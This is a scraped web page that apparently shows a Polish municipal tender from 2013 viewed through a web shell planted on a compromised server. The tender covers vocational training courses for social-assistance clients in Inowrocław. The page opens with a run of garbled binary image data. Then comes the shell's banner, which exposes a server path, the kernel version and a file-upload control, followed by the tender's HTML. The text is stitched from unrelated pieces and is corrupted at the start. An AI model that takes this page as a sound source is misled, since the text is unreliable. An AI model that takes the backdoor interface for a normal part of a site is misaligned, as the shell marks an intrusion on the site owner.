JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/357676-N-2013.html

<p class="kh_header"><b>Inowrocław: Usługa polegająca na zorganizowaniu i przeprowadzeniu szkoleń zawodowych dla klientów Gminnego Ośrodka Pomocy Społecznej w Inowrocławiu jako jednostki organizacyjnej Gminy Inowrocław realizującego projekt systemowy Lepsze jutro w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 357676 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Inowrocław , ul. Królowej Jadwigi 43, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3570251, faks 52 3540490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.inowroclaw.ug.gov.pl, www.gopsinowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na zorganizowaniu i przeprowadzeniu szkoleń zawodowych dla klientów Gminnego Ośrodka Pomocy Społecznej w Inowrocławiu jako jednostki organizacyjnej Gminy Inowrocław realizującego projekt systemowy Lepsze jutro w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa polegająca na zorganizowaniu i przeprowadzeniu szkoleń zawodowych dla klientów Gminnego Ośrodka Pomocy Społecznej w Inowrocławiu jako jednostki organizacyjnej Gminy Inowrocław realizującego projekt systemowy Lepsze jutro w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej
3.2 Zamówienie składa się z 9 części:

Lp.	Nazwa
szkolenia	Ilość osób*	Termin wykonania
zadania	Miejsce realizacji	Ilość godzin szkoleniowych
1	Pracownik małej gastronomii	  3	wrzesień - listopad 2013r. 	Inowrocław	140 godz.
2	Kurs prawo jazdy kat. B	18	wrzesień - listopad 2013r.	Inowrocław	60 godz.
3	Florystyka i zdobienie przedmiotów	  1	wrzesień - listopad 2013r.	Inowrocław	120 godz.
4	Pracownik hurtowni z obsługą wózka jezdniowego	  5	wrzesień - listopad 2013r.	Inowrocław	120 godz.
5	Wizaż i zdobienie paznokci	  2	wrzesień - listopad 2013r.	Inowrocław	120 godz.
6	Operator maszyn do prac ziemnych	  2	wrzesień - listopad 2013r.	Inowrocław	212 godz. 
7	Nowoczesny sprzedawca z obsługą komputera i kasy fiskalnej	  7	wrzesień - listopad 2013r.	Inowrocław	90 godz.
8	Opiekun osób starszych	  7	wrzesień - listopad 2013r.	Inowrocław	140 godz.
9	Spawacz w metodzie 111 lub 135	  1	wrzesień - listopad 2013r.0,	Inowrocław	120 godz.
* Zamawiający przewiduje możliwość zmiany ilości uczestników kursów w przypadku przerwania lub zakończenia udziału w projekcie.


Część 1 Pracownik małej gastronomi.
1.1 Ilość osób do przeszkolenia - 3 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku 
      przerwania lub zakończenia udziału w projekcie) 
1.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
1.3 Liczba godzin szkolenia (dla jednej osoby) - 140 godz. 
      1 godz. dydaktyczna = 60 minut
1.4 Termin wykonania kursu: Od września do listopada 2013r. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
1.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
      - szkolenie BHP, minimum sanitarne;
      - wymogi systemu HACCP;
      - zasady prawidłowego żywienia;
      - wyposażenie techniczne zakładów gastronomicznych;
      - technologia gastronomiczna z towaroznawstwem;
      - podstawy sztuki kucharskiej;
      - systematyka składników mięsnych i jarskich;
      - typologia potraw;
      - procesy gotowania, smażenia, pieczenia, grillowania;
      - planowanie posiłków, sporządzanie menu;
      - metodologia przyrządzania potraw jarskich;
      - przepisy kulinarne kuchni staropolskiej i międzynarodowej;
      - sposoby serwowania dań;
      - obsługa klienta;
      - zajęcia praktyczne z wykorzystaniem poznanych metod i przepisów;
1.6 Wykonawca pokryje koszty związane z przeprowadzeniem niezbędnych badań do
      celów sanitarno - epidemiologicznych, które uprawniają uczestników do pracy w małej 
      gastronomi oraz  otrzymanie książeczki zdrowia dla celów sanitarno epidemiologicznych. 
1.7 Zapewnienie odzieży roboczej(fartuch, rękawiczki, czepek) i środków ochrony pracy    
      wymagane na danym stanowisku pracy.

Część 2 Kurs prawo jazdy kat. B
2.1 Ilość osób do przeszkolenia - 18 osób w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku 
      przerwania lub zakończenia udziału w projekcie). 
2.2 Miejsce szkolenia: Inowrocław.
     2.3 Liczba godzin szkolenia (dla jednej osoby) - 60 godz. zgodnie z Rozporządzeniem   
           Ministra Infrastruktury z dnia 05 marca 2013 roku w sprawie szkolenia, 
           egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i    
           egzaminatorów (Dz.U. z 2013r. poz. 319) Ustawa  Prawo o ruchu drogowym z dnia 
           30 sierpnia 2012r. ( tj. Dz. U z 2012 r. poz. 1137)
2.4 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia teoretyczne powinny   
       trwać od poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz.     
       dziennie. 
 

Część 3 Florystyka i zdobienie przedmiotów
3.1 Ilość osób do przeszkolenia - 1 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
3.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
3.3 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na   
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut
3.4 Termin wykonania kursu: Od września do listopada 2013r. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
     3.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
           - Florystyka: ślubna, komunijna, pogrzebowa, okolicznościowa i inna;
           - zasady doboru kwiatów do różnorodnych kompozycji, techniki ich układania;
           - kompozycje z roślin suchych, sztucznych i żywych; 
           - pielęgnacja kwiatów, narzędzia i środki techniczne;
           - okolicznościowa dekoracja wnętrz;
           - zdobienie przedmiotów użytkowych.
      3.6 Na zajęciach praktycznych należy uwzględnić pracę na kwiatach ciętych, żywych.

Część4 Pracownik hurtowni z obsługą wózka jezdniowego
4.1 Ilość osób do przeszkolenia - 5 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie) 
4.2 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
4.3 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na   
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
4.4 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
4.5 Program szkolenia powinien obejmować co najmniej następujące zagadnienia: 
     - typy stosowanych wózków,
     - budowa wózka,  
     -  czynności operatora przy obsłudze wózków przed podjęciem pracy, w czasie pracy i po  
        pracy, 
     - wiadomości z zakresu ładunkoznawstwa,
     - wiadomości o dozorze technicznym,
     - zasady budowy i działania oraz warunki techniczne obsługi butli i instalacji gazowych, 
     - zasady i warunki techniczne wykonywania wymiany butli z gazem w wózkach    
       widłowych
     - zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz 
       umiejętności udzielania pierwszej pomocy,
     - praktyczna nauka jazdy i manewrowania wózkiem widłowym,
     - uprawnienia eksploatacyjne na wymianę butli gazowych,
     - poznanie najważniejszych programów magazynujących, fakturujących,
     - technologie i zasady gospodarki magazynowej (w tym m.in. proces magazynowy,  
       procedury i dokumenty dostawy, manipulacje materiałami i pakowanie).
4.6 Wykonawca zapewni badania lekarskie dopuszczające do uczestnictwa w kursie oraz    
      zapewni opłatę za przeprowadzenie kursu.
4.7 Kurs winien być przeprowadzony w warunkach zgodnych z Rozporządzeniem Ministra
      Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy
      użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. z 2002 Nr 70, poz. 650 określa 
      wymagania bezpieczeństwa i higieny pracy przy użytkowaniu   wózków jezdniowych z napędem    
      silnikowym. 
4.8 Kurs kończy się egzaminem i uzyskaniem uprawnień na obsługę wózków widłowych i    
      samodzielną wymianę butli gazowej. 

Część 5 Wizaż i zdobienie paznokci 
      Ilość osób do przeszkolenia - 2 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
5.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
5.2 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. Kurs powinien być podzielony na     
       część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
5.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie. 
5.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - zapoznanie z zasadami BHP,
      - procesy starzenia się skóry,
      - dermatologia schorzeń,
      - manicure tradycyjny, biologiczny, pedicure kosmetyczny,
      - budowa paznokcia,
      - masaż dłoni i stóp,
      - zabiegi pielęgnacyjne, metody pielęgnacji skóry,
      - zdobienie paznokci, metody przedłużania paznokci,
      - depilacja ciała,
      - techniki makijażu,
      - elementy kosmetyki ciała,
      - podstawy wizażu, kreacja wizerunku w pracy zawodowej.
5.5 Wykonawca pokryje koszty związane z przeprowadzeniem niezbędnych badań do celów 
      sanitarno - epidemiologicznych dla beneficjentów.

Część 6 Operator maszyn do prac ziemnych 
      Ilość osób do przeszkolenia - 2 osoby w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
5.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
5.2 Liczba godzin szkolenia (dla jednej osoby) - 212 godz. Kurs powinien być podzielony na    
      część teoretyczną i praktyczną.
      1 godz. dydaktyczna = 60 minut.
5.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
5.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - dokumentacji technicznej maszyn roboczych, 
      - bezpieczeństwa i higieny pracy przy eksploatacji maszyn roboczych, 
      - technologii wykonywania robót ziemnych, 
      - użytkowania i obsługi maszyn roboczych,
      - naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i     
        technologicznych,
     - elementy hydrauliki,
     - budowa koparko-ładowarek,
     - technologia robót.
5.5Szkolenie powinno kończyć się wydaniem zaświadczenia ukończenia kursu oraz zorganizowaniem egzaminu po zdaniu którego uczestnicy otrzymają książeczki z Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie uprawniające do wykonywania zawodu Operatora maszyn do robót ziemnych.

Część 7 Nowoczesny sprzedawca z obsługą komputera i kasy fiskalnej
Ilość osób do przeszkolenia - 7 osób w ramach projektu współfinansowanego z EFS,
(Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
     zakończenia udziału w projekcie). 
7.1 Miejsce szkolenia: Inowrocław.
7.2 Liczba godzin szkolenia (dla jednej osoby) - 90 godz. 
      1 godz. dydaktyczna = 60 minut.
7.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
7.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - nowoczesne techniki sprzedaży;
      - obsługa programów magazynowych, fakturujących;
      - pierwszy kontakt z klientem;
      - techniki negocjacyjne;
      - przyjmowanie reklamacji;
      - umiejętność słuchania i zadawania pytań;
      - analiza zachowań konsumentów na rynku;
      - obsługa kas fiskalnych; 
      - higiena pracy.
7.5 Każdy uczestnik musi mieć zapewniony dostęp do kasy fiskalnej(jeden uczestnik przy    
      stanowisku pracy).
7.6 Zajęcia muszą uwzględniać część praktyczną.

Część 8 Opiekun osób starszych
      Ilość osób do przeszkolenia - 7 osób w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
8.1 Miejsce szkolenia: Część teoretyczna i praktyczna szkolenia w Inowrocławiu.
8.2 Liczba godzin szkolenia (dla jednej osoby) - 140 godz. 
      - część teoretyczna 70 godz.
     - część praktyczna (w DPS lub innych placówkach pomocowych dla osób starszych w    
       zakresie opiekuna osoby starszej) 70 godz. 
      1 godz. dydaktyczna = 60 minut.
8.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5 godz. dziennie, a nie więcej niż 8 godz. dziennie.
   8.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
      - nabycie wiedzy teoretycznej i praktycznej z zakresu geriatrii,
      - udzielanie pierwszej pomocy,  
      - nabycie umiejętności pomocy osobom starszym w czynnościach dnia codziennego,
      - pielęgnowanie osób chorych, starszych i niepełnosprawnych,
      - posługiwanie się sprzętem i aparaturą medyczną,
      - prowadzenie dokumentacji,
      - profilaktyka odleżyn,
      - podstawy rehabilitacji i aktywizacji, 
      - podstawy komunikacji z podopiecznym i jego rodziną

Część9 Spawacz w metodzie 111 lub 135
Ilość osób do przeszkolenia - 1 osoba w ramach projektu współfinansowanego z EFS,
      (Zamawiający przewiduje możliwość zmiany liczby uczestników kursu w przypadku przerwania    
      lub zakończenia udziału w projekcie). 
9.1 Miejsce szkolenia: Inowrocław.
9.2 Liczba godzin szkolenia (dla jednej osoby) - 120 godz. 
      1 godz. dydaktyczna = 60 minut.
9.3 Termin wykonania kursu: Od września do listopada 2013r.. Zajęcia powinny trwać od   
      poniedziałku do piątku po min 5  godz. dziennie, a nie więcej niż 8 godz. dziennie.
     9.4 Program szkolenia powinien obejmować co najmniej następujące zagadnienia:
           - przepisy BHP;
           - urządzenia spawalnicze, budowa i ich użytkowanie;
           - charakterystyka pracy w hali produkcyjnej;
           - oznakowanie i wymiarowanie spoin; 
           - metody przygotowania złączy do spawania
           - metody spawania;  
     9.5 Zajęcia muszą uwzględniać część praktyczną.
     9.6 Program szkolenia musi uwzględniać wytyczne Instytutu Spawalnictwa w Gliwicach.
     9.7 Szkolenie zakończy się końcowym egzaminem kwalifikacyjnym według Wytycznych 
           Instytutu Spawalnictwa w Gliwicach W-07/IS-17 oraz wydanie każdemu z kursantów 
          Świadectwa Egzaminu Kwalifikacyjnego Spawacza i książeczki spawacza.  
    9.8 Szkolenie musi być poprzedzone badaniami lekarskimi kursantów przez lekarza 
          Medycyny Pracy.  
    9.9 Koszty badań lekarskich ponosi Wykonawca.  

3.3 Obowiązki wykonawcy (dla wszystkich części):
3.3.1 Wykonawca przygotuje szczegółowy program oraz harmonogram kursów,    
         i przedstawi do zaakceptowania Zamawiającemu. 
3.3.2Wykonawca zapewni prelegentów/trenerów z kompetencjami i uprawnieniami do 
         prowadzenia kursów w przedmiotowym zakresie, którzy przeprowadzili po min. 3 kursy 
         z danej tematyki (dla każdej części).
3.3.3Zapewnienie odpowiednio wyposażonych sal szkoleniowych z zapleczem socjalnym 
         niezbędnym do należytego przeprowadzenia kursów w części teoretycznej i praktycznej 
         każdego dnia, w którym odbywa się szkolenie.
         Wykonawca zapewni sale z oknami zapewniającymi światło dzienne oraz  miejsca 
         siedzące dla uczestników z możliwością sporządzania notatek, wyposażoną w sprzęt 
         audiowizualny, zestawy komputerowe połączone z Internetem.
3.3.4 Wykonawca obejmie ubezpieczeniem NNW wszystkich uczestników kursów
         przekazanych listą przez Zamawiającego, w trakcie oraz w drodze do i z miejsca kursu -   
         od pierwszego do ostatniego dnia kursu. 
3.3.5 Przestrzeganie przepisów o ochronie danych osobowych zgodnie z ustawą z dnia   
         29.09.1997r. o ochronie danych osobowych (Dz.U. z 2002r. Nr.101,poz. 926, z późn. 
         zm.).
3.3.6 Zapewnienie materiałów szkoleniowych (dydaktycznych)  oraz narzędzi niezbędnych do 
        realizacji zajęć w części teoretycznej i praktycznej dla wszystkich uczestników kursu, 
        nie podlegające zwrotowi oraz jeden komplet dla Zamawiającego na potrzeby 
        dokumentacji projektowej.

3.3.7 Wykonawca wystawi uczestnikom szkolenia zaświadczenia certyfikaty o ukończeniu  
         szkolenia zawierających informację o jego temacie oraz wymiarze godzin z logo 
         Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej oraz informacji o 
         współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego 
         Funduszu społecznego.
3.3.8W przypadku gdy  realizacja szkolenia  wymaga zezwoleń i certyfikatów oraz   program 
         szkolenia regulowany jest rozporządzeniami,  Zamawiający wymaga, aby szkolenie to 
         przeprowadzone było zgodnie z obowiązującymi przepisami. Ponadto zajęcia zakończą   
          się wydaniem dokumentów świadczących o uczestnictwie w zajęciach będących   
          przedmiotem zamówienia (zaświadczeń, świadectw, certyfikatów itp.)
3.3.9 Wykonawca przeprowadzi ewaluację z każdego kursu - (przed rozpoczęciem i po 
           realizacji szkolenia ) oraz dokona zbiorczej analizy ankiet i przedstawi     
           zamawiającemu w terminie 14 dni od dnia ukończenia szkolenia.   
3.3.10 Bieżącego informowania zamawiającego o;
          - wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
          - rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy        
          zapłaty za szkolenie tych osób. 
3.3.11Po zakończeniu usługi szkoleniowej Wykonawca przedstawi Zamawiającemu  
          dokumentację szkolenia, na którą złożą się: listy obecności, listy potwierdzające 
          odbiór materiałów, listy potwierdzające korzystanie z posiłków, kopie certyfikatów 
          oraz listę potwierdzającą ich odbiór, dziennik zajęć zawierający liczbę godzin i 
          tematy szkolenia, oryginały ankiet ewaluacyjnych, zdjęcia z przebiegu szkolenia , 
          informacja wykonania usługi szkoleniowej. 
3.3.12 Odpowiednie oznaczenie wszystkich miejsc i dokumentów bezpośrednio związanych   
           z realizacją szkolenia. Wytyczne i logotypy dostępne są na stronie www.efs.gov.pl 
3.3.13Dostarczenie Zamawiającemu do celów dokumentacyjnych zdjęć w formie   
          elektronicznej z przebiegu realizacji szkoleń.
3.3.14 Wykonawca zobowiązany jest zapewnić nieodpłatnie uczestnikom szkoleń środki 
           ochrony indywidualnej oraz zobligować ich do stosowania, jeżeli przepisy 
           szczegółowe w zakresie bezpieczeństwa i higieny pracy wymagają stosowania takich 
           środków podczas wykonywania zadań. 
3.3.15 W przypadku awarii jakiegokolwiek sprzętu używanego podczas realizacji zajęć, 
          Wykonawca jest zobowiązany zastąpić sprzęt niesprawny na sprzęt sprawny, tak aby 
           zajęcia odbywały się bez przestoju. 
3.3.14 Dla Części 1,2,3,4,5,6,7,8,9 podczas prowadzenia zajęć teoretycznych i praktycznych,  
           dłużej niż 4 godz. dziennie Wykonawca jest zobowiązany do zapewnienia uczestnikom  
           kursu w każdym dniu zajęć jednego ciepłego posiłku (np. ziemniaki, ryż lub frytki, 
           surówka, ryba, kotlet schabowy lub z kurczaka lub równoważnej porcji   
           wegetariańskiej). Posiłki powinny być urozmaicane, posiadać odpowiednie walory 
           smakowe i zapachowe. Zamawiający nie dopuszcza możliwości serwowania ciepłego     
           posiłku w formie dań gotowych typu Fast food oraz gotowych zup typu instant.
3.3.15Dla części 1,2,3,4,5,6,7,8,9 Wykonawca jest zobowiązany do zapewnienia uczestnikom    
          kursu w każdym dniu zajęć serwisu kawowego w przerwach pomiędzy zajęciami, 
          składającego się z:kawy czarnej, śmietanka do kawy, herbaty czarnej, wrzątek w   
          termosach oraz ciastka kruche min. 10 dag na osobę.
3.3.16Dla części 2 Wykonawca jest zobowiązany do: 
         - pokrycia kosztów za materiały szkoleniowe dla 18 uczestników , w tym kodeks 
           drogowy dla każdego uczestnika,    
         - opłata za wydanie prawa jazdy 
         - koszty wymaganych badań lekarskich dla kandydatów na kierowców kat. B oraz  
           wszelkie opłaty związane z realizacją praktycznej nauki jazdy,
         - koszty pierwszego egzaminu,
         - koszty ubezpieczenia kursantów NNW przed rozpoczęciem realizacji przedmiotu   
           zamówienia,
        - przeprowadzenie wew. egzaminu zgodnie z przepisami,
        - po zakończeniu nauki jazdy Wykonawca wystawi słuchaczom zaświadczenia o    
          ukończeniu części teoretycznej i praktycznej, uprawniające ich do przystąpienia do   
          państwowego egzaminu na prawo jazdy kat. B  
          Godziny jazdy będą odnotowywane na bieżąco przez instruktorów w indeksach     
          słuchaczy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym 
         zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu - 
         Zał. nr. 2
     -  O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy posiadają wpis do  
         rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy,   
         właściwy ze względu na siedzibę instytucji szkoleniowej.
         Spełnienie warunków zostanie ocenione na podstawie złożonego oświadczenia, wg    
         formuły spełnia/nie spełnia, w oparciu o dołączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
